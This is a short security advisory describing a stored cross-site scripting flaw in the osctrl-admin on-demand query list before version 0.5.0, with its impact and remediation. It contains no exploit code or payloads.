osctrl Stored Cross-Site Scripting Vulnerability in On-Demand Query List

A stored cross-site scripting vulnerability has been identified in osctrl, an osquery management solution, prior to version 0.5.0. This vulnerability exists in the 'osctrl-admin' on-demand query list, where a user with query-level permissions can inject arbitrary JavaScript via the query parameter. The injected payload is stored and executed in the browsers of users, including administrators, who visit the query list page. This vulnerability can be exploited by chaining it with CSRF token extraction to escalate privileges and perform actions as the logged-in user. An attacker with query-level permissions can execute arbitrary JavaScript in the browsers of all users who view the query list, potentially leading to a full platform compromise if an administrator executes the payload.

Impact

Exploitation allows for the execution of arbitrary JavaScript in the browsers of users viewing the query list, with the potential for full platform compromise if an administrator is affected.

Remediation

The vulnerability is fixed in osctrl version 0.5.0. Users should upgrade immediately. As a workaround, query-level permissions should be restricted to trusted users, the query list should be monitored for suspicious payloads, and osctrl user accounts should be reviewed for unauthorized administrators.